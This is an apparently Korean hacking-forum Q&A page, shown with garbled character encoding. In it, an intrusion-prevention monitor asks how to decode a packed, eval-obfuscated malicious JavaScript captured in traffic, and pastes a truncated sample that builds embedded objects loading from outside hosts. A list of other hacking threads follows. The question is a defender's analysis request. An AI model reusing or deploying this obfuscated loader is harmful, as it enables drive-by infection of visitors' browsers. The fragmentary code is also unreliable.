214, 10/11 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   yeastblue
   eval¿¡ ´ëÇؼ­

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_Web&no=77 [º¹»ç]


¾È³çÇϼ¼¿ä. IPS ¸ð´ÏÅ͸µÇÏ°í Àִ»ç¶÷ÀÔ´Ï´Ù. ¾î´À³¯ raw data¸¦ º¸´Ï eval·Î µÈ malicious javascript °ø°ÝÀÌ Áö¼ÓÀûÀ¸·Î µé¾î¿À´õ±º¿ä.  Src Ip°¡ Áö¼ÓÀûÀ¸·Î malicious javascript°¡ ÇÏ·ç¿¡ ¸îõ°Ç¾¿ µé¾î¿À°í ÀÖ½À´Ï´Ù. ¹®Á¦´Â ¹ØÀÇ raw data¸¦ µðÄÚµùÇÏ´Â °ÍÀε¥ deanÀÌ ¸¸µç malicious javascript °ø°ÝÀÌ ²Ï ºÐ¼®Çϱ⠾î·Æ´õ±º¿ä. Á˼ÛÇÏÁö¸¸ ¹ØÀÇ raw dataÀÇ µðÄÚµùÇÏ´Â ¹ýÁ» °¡¸£ÃÄ ÁֽʽÿÀ. ¤Ð.¤Ð alert´Â ÀÌ¹Ì ½áº¸¾Ò½À´Ï´Ù. ÇÏÁö¸¸ À߸øµÈ Àü¼ÛÀ̶ó¸é¼­ ¿¡·¯¸Þ½ÃÁö Æ˾÷âÀÌ ¶å´Ï´Ù.
=>eval(function(p,a,c,k,e,d)
{
        e=function(c)
        {
                return(c<a?'':e(parseInt(c/a)))+((c=c%a)35? String.fromCharCode(c+29):c.toString(36))
        };
if(!''.replace(/^/,String))
{
        while(c--)
        {
                d[e(c)]=k[c]||e(c)
        }
k=[function(e){        return d[e]}];e=function(){return'\\w+'};c=1};while(c--)
{
if(k[c])
        {
                p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
        }
}
return p
}
('3 1w="b://O.p.k/I/";3 1x=[];3 K=1y D();K[0]=D("1u","0","2","",1,1r,0,0,1s,1t,0,"1z","1A","1G",1,0.4,"1H",1);3 1I=D("1E.c","E.c","H");3 B=[];3 z=[];3 A=[];3 F=[];3 y=[];3 G=[];B[0]="b://1B.p.k/1C/1D.1q?t=1p";z[0]="1c.c";A[0]="b://1d.1e.L/1b/?1a";F[0]="E.c";y[0]="H";G[0]="J";B[1]="b://17.18.19.L/1g.1m?1n=1o&1l=1k";z[1]="1i.c";A[1]="#";F[1]="E.c";y[1]="H";G[1]="J";3 24=25;3 2a=j;3 2b,2j;3 2h;P N(){u(!f.S("l")){3 a=f.2g("9");a.5="l";f.2f.2d(a);a.e.d=1;a.e.g=1;a.e.21="1Q"}3 i="ɡ 5=\\"1R\\" >";i+=M(\'b://O.p.k/I/1N.1S\',\'R\',\'R\',\'1Z\',\'\',\'\',\'20\');i+="</9>";3 r=f.S(\'l\');u(r){r.1U=i}}P M(v,w,h,5,q,s,o){u(1M.2e=="2c 29 1j"){3 n="<Q 1T=\'C j\' 2i=\'1W:1V-1X-1Y-1L-1O\' 15=\'12/x-11-10\' g=\'"+w+"\' d=\'"+h+"\' 5=\'"+5+"\' 6=\'"+5+"\' Y=\'Z\'>"+"ɠ 6=\'23\' 7=\'"+v+"\' />"+"ɠ 6=\'14\' 7=\'"+s+"\' />"+"ɠ 6=\'X\' 7=\'"+o+"\' />"+"ɠ 6=\'6\' 7=\'"+5+"\' />"+"ɠ 6=\'W\' 7=\'j\' />"+"ɠ 6=\'V\' 7=\'T\' />"+"ɠ 6=\'27\'7=\'13\' /

  Hit : 3307     Date : 2011/10/05 12:29



    
xzvsda ¼Ò½º ©¸°°Å °°Àºµ¥ ¿øº»À» ÷ºÎÆÄÀÏ·Î ¿Ã·ÁÁÖ¼¼¿ä 2011/10/05  
yeastblue ¿ª½Ã ©¸°°Í ¸ÂÁÒ?.¤Ð.¤Ð IPS¿¡¼­ ³ª¿Â raw data ÀÔ´Ï´Ù. ÷ºÎÆÄÀÏÀÌ ¾ø¾î¿ä.¤Ð.¤Ð ÇØ´ç Src IP¸¦ °¡µµ ÁغñÁßÀÔ´Ï´Ù.¸¸ Ç¥½ÃµÇ´Âµ¥ Src IP°¡ ¿©·¯±ºµ¥¿¡¼­ ¶È°°ÀÌ ÁغñÁßÀÔ´Ï´Ù¸¸ µÇ¾î ÀÖ½À´Ï´Ù.¤Ð.¤Ð À§¿¡ ºÎºÐ ©¸°ºÎºÐÀÌ¶óµµ Çؼ®ÀÌ ¾î´ÀÁ¤µµ °¡´ÉÇÑ°¡¿ä?.¤Ð.¤Ð 2011/10/05  
rocket07 ¸Û°¡ ÀÌ°Ç!! ¤¾¤¾ ±î¸®ÇÏ´Ù 2012/01/21  
34   ¾È³çÇϼ¼¿ä~ ¿À´Ã netcat ·Î ȸ»çÄÄÇ»ÅÍ ÇØÅ·°øºÎÇϴµ¥¿ä[2]     xfindcokr
03/17 3856
33   À¥ ÇØÅ· ȨÆäÀÌÁö[3]     xkdlrjxkdltm
08/28 3799
32   »ó´ë¹æÀÇ ¾ÆÀÌÇÇÁÖ¼Ò¸¦ ÀÌ¿ëÇÏ¿©...[1]     xnm798
07/23 3590
31   sql injection °ø°Ý ¿À·ù¹ÝȯÁú¹®ÀÌ¿ä.[4]     yayaja11
03/21 2806
30   ÇÁ·Ï½Ã ÇÁ·Î±×·¥ÀÌ ¾ÈµË´Ï´Ù[1]     yayaja11
03/05 2854
  eval¿¡ ´ëÇؼ­[3]     yeastblue
10/05 3306
28   Æķνº ±ò¾Æ¼­ ½ÇÇà½ÃÄ״µ¥ ¿ÖÀÌ·¯ÁÒ?(»çÁøêó)[1]     ygh159
07/13 4312
27   Odysseus ¶ó´Â ÇÁ·Î±×·¥¿¡ ´ëÇØ ¿©ÂÞ¾î º¾´Ï´Ù.     ygh159
08/18 3630
26   ¸ðÀÇÇØÅ· °Ô½ÃÆÇ Çϳª ¸¸µé·Á°í Çϴµ¥ µµ¿ÍÁÖ¼¼¿ä.[1]     ygh357
09/22 3578
25   LFI¿ÍRFI½ÄÀ¸·Î ÆÄÀϾ÷·Îµå Áú¹®[1]     ygh357
10/18 4156
24   ÀÌ ÇÁ·Î±×·¥ ¹ºÁö ¾Æ½Ã´ÂºÐ?(»çÁøêó)[8]     ygh357
12/16 4252
23   À¥ÇØÅ·ÇÏ°í½Í¾î¼­ ¹è¿ì°íÀִµ¥ htmlÇÏ°í css ű׳ª»ö»óµîµî..ÀÌ·±°Å±îÁö ¹è¿ïÇÊ¿ä°¡ÀÖ³ª¿ä?;;[8]     ykk98433
06/29 4057
22   À¥ html¿¡ °üÇؼ­ Áú¹®ÀÌÀִµ¥¿ä[1]     yuhioh8
06/19 3019
21   À¥ÇØÅ·¿¡ ÇÊ¿äÇÑ ¾ð¾î[3]     yunpung1234
08/17 3692
20   ¸ÞÀÏ ¼ö½ÅÀÚ ¶Ç´Â ¹ß½ÅÀÚ IP[1]     zaksalna
04/22 5495
19     Æķνº     zen0c1de
07/18 3255
18   sslstripÀ¸·Î Æ®À§ÅÍ ½º´ÏÇÎ Çغ»½ÅºÐ ÀÖ³ª¿ä?     Å×Ã÷
02/21 3372
17   ÇØÅ·¸Àº¸±â(¼­Àû) ¾ÆÆÄÄ¡ÇÁ·Î±×·¥ Áú¹®ÀÔ´Ï´Ù[1]     Ä¿¼¼¾î
09/29 2659
16   ¾ÆÆÄÄ¡ php mysql ¿¬µ¿°ü·Ã Áú¹®ÀÔ´Ï´Ù.[3]     Ä¿¼¼¾î
10/19 3599
15   webhacking.kr °¡ÀÔ¹®Á¦ ¹Ù²¸¼­ Àß ¸ð¸£°Ú½À´Ï´Ù[1]     ¤»z¤Ól¤²q¤Çh¤§e¤Ñm
01/18 5844
[1][2][3][4][5][6][7][8][9] 10 ..[11]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org